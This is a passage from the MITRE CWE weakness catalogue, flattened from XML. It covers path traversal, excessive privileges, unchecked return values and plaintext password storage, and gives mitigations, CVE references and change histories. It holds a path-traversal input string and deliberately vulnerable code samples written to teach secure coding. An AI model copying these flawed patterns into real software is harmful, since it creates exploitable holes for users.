environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - '/../filedir - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Path Issue - Leading Dot Dot Slash - '/../filedir' - - - - The software performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses. - - New weaknesses can be exposed because running with extra privileges, such as root or Administrator, can disable the normal security checks being performed by the operating system or surrounding environment. Other pre-existing weaknesses can turn into security vulnerabilities if they occur while operating at raised privileges. - Privilege management functions can behave in some less-than-obvious ways, and they have different quirks on different platforms. These inconsistencies are particularly pronounced if you are transitioning from one non-root user to another. Signal handlers and spawned processes run at the privilege of the owning process, so if a process is running as root when a signal fires or a sub-process is executed, the signal handler or sub-process will operate with root privileges. - - - - - - - - - - - - Implementation - - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - Installation - - - Architecture and Design - - If an application has this design problem, then it can be easier for the developer to make implementation-related errors such as CWE-271 (Privilege Dropping / Lowering Errors). In addition, the consequences of Privilege Chaining (CWE-268) can become more severe. - - - - Operation - - - Medium - - - Confidentiality - Integrity - Availability - Access Control - Gain Privileges or Assume Identity - Execute Unauthorized Code or Commands - Read Application Data - DoS: Crash, Exit, or Restart - An attacker will be able to gain access to any resources that are allowed by the extra privileges. Common results include executing code, disabling services, and reading restricted data. - - - - - Manual Analysis - This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. - These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - Black Box - - Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. - Attach the monitor to the process and perform a login. Look for library functions and system calls that indicate when privileges are being raised or dropped. Look for accesses of resources that are restricted to normal users. - - Note that this technique is only useful for privilege issues related to system resources. It is not likely to detect application-level business rules that are related to privileges, such as if a blog system allows a user to delete a blog entry without first checking that the user has administrator privileges. - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Compare binary / bytecode to application permission manifest - - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - High - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Automated Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Host-based Vulnerability Scanners - Examine configuration for flaws, verifying that audit mechanisms work, ensure host configuration meets certain predefined criteria - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Host Application Interface Scanner - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Automated Static Analysis - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Configuration Checker - Permission Manifest Analysis - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Attack Modeling - - - - - High - - - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - Architecture and Design - Separation of Privilege - Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [REF-76]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators. - - - Architecture and Design - Attack Surface Reduction - Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [REF-76]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators. - - - Implementation - Perform extensive input validation for any privileged code that must be exposed to the user and reject anything that does not fit your strict requirements. - - - Implementation - When dropping privileges, ensure that they have been dropped successfully to avoid CWE-273. As protection mechanisms in the environment get stronger, privilege-dropping calls may fail even if it seems like they would always succeed. - - - Implementation - If circumstances force you to run with extra privileges, then determine the minimum access level necessary. First identify the different permissions that the software and its users will need to perform their actions, such as file read and write permissions, network socket permissions, and so forth. Then explicitly allow those actions while denying all else [REF-76]. Perform extensive input validation and canonicalization to minimize the chances of introducing a separate vulnerability. This mitigation is much more prone to error than dropping the privileges in the first place. - - - Operation - System Configuration - Environment Hardening - Ensure that the software runs properly under the Federal Desktop Core Configuration (FDCC) [REF-199] or an equivalent hardening configuration guide, which many organizations use to limit the attack surface and potential risk of deployed software. - - - - - This code temporarily raises the program's privileges to allow creation of a new user folder. - - def makeNewUserDir(username): - if invalidUsername(username): - - - #avoid CWE-22 and CWE-78 - print('Usernames cannot contain invalid characters')return False - - try:raisePrivileges()os.mkdir('/home/' + username)lowerPrivileges() - except OSError:print('Unable to create new user directory for user:' + username)return False - return True - - - - While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur. - - - The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file. - - chroot(APP_HOME);chdir("/");FILE* data = fopen(argv[1], "r+");... - - Constraining the process inside the application's home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced. - - - This application intends to use a user's location to determine the timezone the user is in: - - locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();setTimeZone(userCurrLocation); - - This is unnecessary use of the location API, as this information is already available using the Android Time API. Always be sure there is not another way to obtain needed information before resorting to using the location API. - - - This code uses location to determine the user's current US State location. - First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application's manifest.xml: - - <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/> - - During execution, a call to getLastLocation() will return a location based on the application's location permissions. In this case the application has permission for the most accurate location possible: - - locationClient = new LocationClient(this, this, this);locationClient.connect();Location userCurrLocation;userCurrLocation = locationClient.getLastLocation();deriveStateFromCoords(userCurrLocation); - - While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in. - - - - - CVE-2007-4217 - FTP client program on a certain OS runs with setuid privileges and has a buffer overflow. Most clients do not need extra privileges, so an overflow is not a vulnerability for those clients. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4217 - - - CVE-2008-1877 - Program runs with privileges and calls another program with the same privileges, which allows read of arbitrary files. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1877 - - - CVE-2007-5159 - OS incorrectly installs a program with setuid privileges, allowing users to gain privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5159 - - - CVE-2008-4638 - Composite: application running with high privileges (CWE-250) allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file (CWE-209). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4638 - - - CVE-2008-0162 - Program does not drop privileges before calling another program, allowing code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0162 - - - CVE-2008-0368 - setuid root program allows creation of arbitrary files through command line argument. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0368 - - - CVE-2007-3931 - Installation script installs some programs as setuid when they shouldn't be. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3931 - - - - - Often Misused: Privilege Management - - - SER09-J - Minimize privileges before deserializing from a privilege context - - - - - - - - - - - - - - - - - - There is a close association with CWE-653 (Insufficient Separation of Privileges). CWE-653 is about providing separate components for each privilege; CWE-250 is about ensuring that each component has the least amount of privileges possible. - CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category. Both CWE-272 and CWE-250 are in active use by the community. The "least privilege" phrase has multiple interpretations. - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Modes_of_Introduction, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description, Maintenance_Notes - - - CWE Content Team - MITRE - 2009-01-12 - updated Common_Consequences, Description, Likelihood_of_Exploit, Maintenance_Notes, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Time_of_Introduction - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-02-16 - updated Detection_Factors, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-06-21 - updated Detection_Factors, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2014-02-18 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-07-30 - updated Detection_Factors - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-09-19 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Detection_Factors, Observed_Examples, References, Relationships, Type - - Often Misused: Privilege Management - Design Principle Violation: Failure to Use Least Privilege - - - - The software does not check the return value from a method or function, which can prevent it from detecting unexpected states and conditions. - Two common programmer assumptions are "this function call can never fail" and "it doesn't matter if this function call fails". If an attacker can force the function to fail or otherwise return a value that is not expected, then the subsequent program logic could lead to a vulnerability, because the software is not in a state that the programmer assumes. For example, if the program calls a function to drop privileges but does not check the return code to ensure that privileges were successfully dropped, then the program will continue to operate with the higher privileges. - - - - - - - - Primary - - - - - - - Many functions will return some value about the success of their actions. This will alert the program whether or not to handle any errors caused by that function. - - - - Implementation - - - Low - - - Availability - Integrity - Unexpected State - DoS: Crash, Exit, or Restart - An unexpected return value could place the system in a state that could lead to a crash or other unintended behaviors. - - - - - Implementation - Check the results of all functions that return a value and verify that the value is expected. - High - Checking the return value of the function will typically be sufficient, however beware of race conditions (CWE-362) in a concurrent environment. - - - Implementation - Ensure that you account for all possible return values from the function. - - - Implementation - When designing a function, make sure you return a value or throw an exception in case of an error. - - - - - Consider the following code segment: - - char buf[10], cp_buf[10];fgets(buf, 10, stdin);strcpy(cp_buf, buf); - - The programmer expects that when fgets() returns, buf will contain a null-terminated string of length 9 or less. But if an I/O error occurs, fgets() will not null-terminate buf. Furthermore, if the end of the file is reached before any characters are read, fgets() returns without writing anything to buf. In both of these situations, fgets() signals that something unusual has happened by returning NULL, but in this code, the warning will not be noticed. The lack of a null terminator in buf can result in a buffer overflow in the subsequent call to strcpy(). - - - In the following example, it is possible to request that memcpy move a much larger segment of memory than assumed: - - int returnChunkSize(void *) { - - - /* if chunk info is valid, return the size of usable memory, - - - * else, return -1 to indicate an error - - - */ - ... - }int main() {...memcpy(destBuf, srcBuf, (returnChunkSize(destBuf)-1));...} - - If returnChunkSize() happens to encounter an error it will return -1. Notice that the return value is not checked before the memcpy operation (CWE-252), so -1 can be passed as the size argument to memcpy() (CWE-805). Because memcpy() assumes that the value is unsigned, it will be interpreted as MAXINT-1 (CWE-195), and therefore will copy far more memory than is likely available to the destination buffer (CWE-787, CWE-788). - - - The following code does not check to see if memory allocation succeeded before attempting to use the pointer returned by malloc(). - - buf = (char*) malloc(req_size);strncpy(buf, xfer, req_size); - - The traditional defense of this coding error is: "If my program runs out of memory, it will fail. It doesn't matter whether I handle the error or allow the program to die with a segmentation fault when it tries to dereference the null pointer." This argument ignores three important considerations: - - - - Depending upon the type and size of the application, it may be possible to free memory that is being used elsewhere so that execution can continue. - - - It is impossible for the program to perform a graceful exit if required. If the program is performing an atomic operation, it can leave the system in an inconsistent state. - - - The programmer has lost the opportunity to record diagnostic information. Did the call to malloc() fail because req_size was too large or because there were too many requests being handled at the same time? Or was it caused by a memory leak that has built up over time? Without handling the error, there is no way to know. - - - - - - The following examples read a file into a byte array. - - char[] byteArray = new char[1024];for (IEnumerator i=users.GetEnumerator(); i.MoveNext() ;i.Current()) {String userName = (String) i.Current();String pFileName = PFILE_ROOT + "/" + userName;StreamReader sr = new StreamReader(pFileName);sr.Read(byteArray,0,1024);//the file is always 1k bytessr.Close();processPFile(userName, byteArray);} - - - FileInputStream fis;byte[] byteArray = new byte[1024];for (Iterator i=users.iterator(); i.hasNext();) { - String userName = (String) i.next();String pFileName = PFILE_ROOT + "/" + userName;FileInputStream fis = new FileInputStream(pFileName);fis.read(byteArray); // the file is always 1k bytesfis.close();processPFile(userName, byteArray); - - - - - The code loops through a set of users, reading a private data file for each user. The programmer assumes that the files are always 1 kilobyte in size and therefore ignores the return value from Read(). If an attacker can create a smaller file, the program will recycle the remainder of the data from the previous user and treat it as though it belongs to the attacker. - - - The following code does not check to see if the string returned by getParameter() is null before calling the member function compareTo(), potentially causing a NULL dereference. - - String itemName = request.getParameter(ITEM_NAME);if (itemName.compareTo(IMPORTANT_ITEM) == 0) {...}... - - The following code does not check to see if the string returned by the Item property is null before calling the member function Equals(), potentially causing a NULL dereference. - - String itemName = request.Item(ITEM_NAME);if (itemName.Equals(IMPORTANT_ITEM)) {...}... - - The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved. - - - The following code shows a system property that is set to null and later dereferenced by a programmer who mistakenly assumes it will always be defined. - - System.clearProperty("os.name");...String os = System.getProperty("os.name");if (os.equalsIgnoreCase("Windows 95")) System.out.println("Not supported"); - - The traditional defense of this coding error is: "I know the requested value will always exist because.... If it does not exist, the program cannot perform the desired behavior so it doesn't matter whether I handle the error or allow the program to die dereferencing a null value." But attackers are skilled at finding unexpected paths through programs, particularly when exceptions are involved. - - - The following VB.NET code does not check to make sure that it has read 50 bytes from myfile.txt. This can cause DoDangerousOperation() to operate on an unexpected value. - - Dim MyFile As New FileStream("myfile.txt", FileMode.Open, FileAccess.Read, FileShare.Read)Dim MyArray(50) As ByteMyFile.Read(MyArray, 0, 50)DoDangerousOperation(MyArray(20)) - - In .NET, it is not uncommon for programmers to misunderstand Read() and related methods that are part of many System.IO classes. The stream and reader classes do not consider it to be unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested. - - - It is not uncommon for Java programmers to misunderstand read() and related methods that are part of many java.io classes. Most errors and unusual events in Java result in an exception being thrown. But the stream and reader classes do not consider it unusual or exceptional if only a small amount of data becomes available. These classes simply add the small amount of data to the return buffer, and set the return value to the number of bytes or characters read. There is no guarantee that the amount of data returned is equal to the amount of data requested. This behavior makes it important for programmers to examine the return value from read() and other IO methods to ensure that they receive the amount of data they expect. - - - This example takes an IP address from a user, verifies that it is well formed and then looks up the hostname and copies it into a buffer. - - void host_lookup(char *user_supplied_addr){ - struct hostent *hp;in_addr_t *addr;char hostname[64];in_addr_t inet_addr(const char *cp); - - /*routine that ensures user_supplied_addr is in the right format for conversion */ - - validate_addr_form(user_supplied_addr);addr = inet_addr(user_supplied_addr);hp = gethostbyaddr( addr, sizeof(struct in_addr), AF_INET);strcpy(hostname, hp->h_name); - } - - If an attacker provides an address that appears to be well-formed, but the address does not resolve to a hostname, then the call to gethostbyaddr() will return NULL. Since the code does not check the return value from gethostbyaddr (CWE-252), a NULL pointer dereference - (CWE-476) would then occur in the call to strcpy(). - Note that this code is also vulnerable to a buffer overflow (CWE-119). - - - The following function attempts to acquire a lock in order to perform operations on a shared resource. - - void f(pthread_mutex_t *mutex) { - pthread_mutex_lock(mutex); - - /* access shared resource */ - - - pthread_mutex_unlock(mutex); - } - - However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior. - In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels. - - int f(pthread_mutex_t *mutex) { - int result; - result = pthread_mutex_lock(mutex);if (0 != result)return result; - - - /* access shared resource */ - - - return pthread_mutex_unlock(mutex); - } - - - - - - CVE-2020-17533 - Chain: unchecked return value (CWE-252) of some functions for policy enforcement leads to authorization bypass (CWE-862) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17533 - - - CVE-2020-6078 - Chain: The return value of a function returning a pointer is not checked for success (CWE-252) resulting in the later use of an uninitialized variable (CWE-456) and a null pointer dereference (CWE-476) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6078 - - - CVE-2019-15900 - Chain: sscanf() call is used to check if a username and group exists, but the return value of sscanf() call is not checked (CWE-252), causing an uninitialized variable to be checked (CWE-457), returning success to allow authorization bypass for executing a privileged (CWE-863). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15900 - - - CVE-2007-3798 - Unchecked return value leads to resultant integer overflow and code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3798 - - - CVE-2006-4447 - Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4447 - - - CVE-2006-2916 - Program does not check return value when invoking functions to drop privileges, which could leave users with higher privileges than expected by forcing those functions to fail. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2916 - - - CVE-2008-5183 - chain: unchecked return value can lead to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5183 - - - CVE-2010-0211 - chain: unchecked return value (CWE-252) leads to free of invalid, uninitialized pointer (CWE-824). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0211 - - - CVE-2017-6964 - Linux-based device mapper encryption program does not check the return value of setuid and setgid allowing attackers to execute code with unintended privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6964 - - - - - Unchecked Return Value - - - Ignored function return value - - - A7 - Improper Error Handling - CWE More Specific - - - ERR33-C - Detect and handle standard library errors - Imprecise - - - POS54-C - Detect and handle POSIX library errors - Imprecise - - - EXP00-J - Do not ignore values returned by methods - - - EXP32-PL - Do not ignore function return values - Exact - - - SFP4 - Unchecked Status Condition - - - ASCSM-CWE-252-resource - - - ASCRM-CWE-252-data - - - ASCRM-CWE-252-resource - - - - - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-01-12 - updated Background_Details, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-12-28 - updated Common_Consequences, Demonstrative_Examples, References - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples, Potential_Mitigations, References - - - CWE Content Team - MITRE - 2010-04-05 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples, References - - - CWE Content Team - MITRE - 2010-09-27 - updated Observed_Examples - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, References, Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Observed_Examples, Relationships, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2021-07-20 - updated Observed_Examples - - - Martin Sebor - Cisco Systems, Inc. - 2010-04-30 - Provided Demonstrative Example and suggested CERT reference - - - - - The software incorrectly checks a return value from a function, which prevents the software from detecting errors or exceptional conditions. - Important and common functions will return some value about the success of its actions. This will alert the program whether or not to handle any errors caused by that function. - - - - - - - - - - Implementation - - - Low - - - Availability - Integrity - Unexpected State - DoS: Crash, Exit, or Restart - An unexpected return value could place the system in a state that could lead to a crash or other unintended behaviors. - - - - - Architecture and Design - Language Selection - Use a language or compiler that uses exceptions and requires the catching of those exceptions. - - - Implementation - Properly check all functions which return a value. - - - Implementation - When designing any function make sure you return a value or throw an exception in case of an error. - - - - - This code attempts to allocate memory for 4 integers and checks if the allocation succeeds. - - tmp = malloc(sizeof(int) * 4);if (tmp < 0 ) { - perror("Failure"); - //should have checked if the call returned 0 - - - } - - The code assumes that only a negative return value would indicate an error, but malloc() may return a null pointer when there is an error. The value of tmp could then be equal to 0, and the error would be missed. - - - - - Misinterpreted function return value - - - SFP4 - Unchecked Status Condition - - - ERR33-C - Detect and handle standard library errors - Imprecise - - - POS54-C - Detect and handle POSIX library errors - Imprecise - - - - - - - - - CLASP - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - Misinterpreted Function Return Value - - - - Storing a password in plaintext may result in a system compromise. - Password management issues occur when a password is stored in plaintext in an application's properties, configuration file, or memory. Storing a plaintext password in a configuration file allows anyone who can read the file access to the password-protected resource. In some contexts, even storage of a plaintext password in memory is considered a security risk if the password is not cleared immediately after it is used. - - - - - - Primary - - - - - - - - Architecture and Design - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - - - Architecture and Design - Developers sometimes believe that they cannot defend the application from someone who has access to the configuration, but this belief makes an attacker's job easier. - - - High - - - Access Control - Gain Privileges or Assume Identity - - - - - Architecture and Design - Avoid storing passwords in easily accessible locations. - - - Architecture and Design - Consider storing cryptographic hashes of passwords as an alternative to storing in plaintext. - - - A programmer might attempt to remedy the password management problem by obscuring the password with an encoding function, such as base 64 encoding, but this effort does not adequately protect the password because the encoding can be detected and decoded easily. - None - - - - - The following code reads a password from a properties file and uses the password to connect to a database. - - ...Properties prop = new Properties();prop.load(new FileInputStream("config.properties"));String password = prop.getProperty("password");DriverManager.getConnection(url, usr, password);... - - This code will run successfully, but anyone who has access to config.properties can read the value of password. If a devious employee has access to this information, they can use it to break into the system. - - - The following code reads a password from the registry and uses the password to create a new network credential. - - ...String password = regKey.GetValue(passKey).toString();NetworkCredential netCred = new NetworkCredential(username,password,domain);... - - This code will run successfully, but anyone who has access to the registry key used to store the password can read the value of password. If a devious employee has access to this information, they can use it to break into the system - - - The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. - This Java example shows a properties file with a cleartext username / password pair. - - - - # Java Web App ResourceBundle properties file - ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... - - The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. - - ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... - - Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. - - - - - Password Management - - - SFP23 - Exposed Data - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Demonstrative_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Modes_of_Introduction, Other_Notes, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - 